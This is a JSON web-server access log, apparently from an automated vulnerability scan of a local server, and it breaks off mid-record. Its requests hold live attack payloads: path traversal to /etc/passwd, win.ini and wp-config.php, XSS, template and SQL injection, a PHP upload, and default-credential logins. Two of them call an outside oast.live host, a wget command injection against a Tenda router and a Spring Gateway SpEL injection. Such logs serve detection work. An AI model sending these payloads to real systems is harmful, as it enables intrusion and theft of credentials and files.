+{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.staging.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29KD1uuBgHm2i0pi6r9pH8tJWIo')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca28fg0smpvbd3qg07h0hwm5fw6ywsk6w.oast.live&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/operator/fileread?READ.filePath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cobbler_web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/logs/laravel.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"IWP_JSON_PREFIX","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29KD1uuBgHm2i0pi6r9pH8tJWIo')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetSrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KD23FijY89GJ6hqLDJ12Pa18D.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29KD23FijY89GJ6hqLDJ12Pa18D&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose-dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/GetDevice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/29KD1yjg1nEu4b3qS9RvfFYOSWm/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22ca28fg0smpvbd3qg07h08c6hwye4rbr5p.oast.live\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/29KD1yjg1nEu4b3qS9RvfFYOSWm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:45:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/resource_config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; 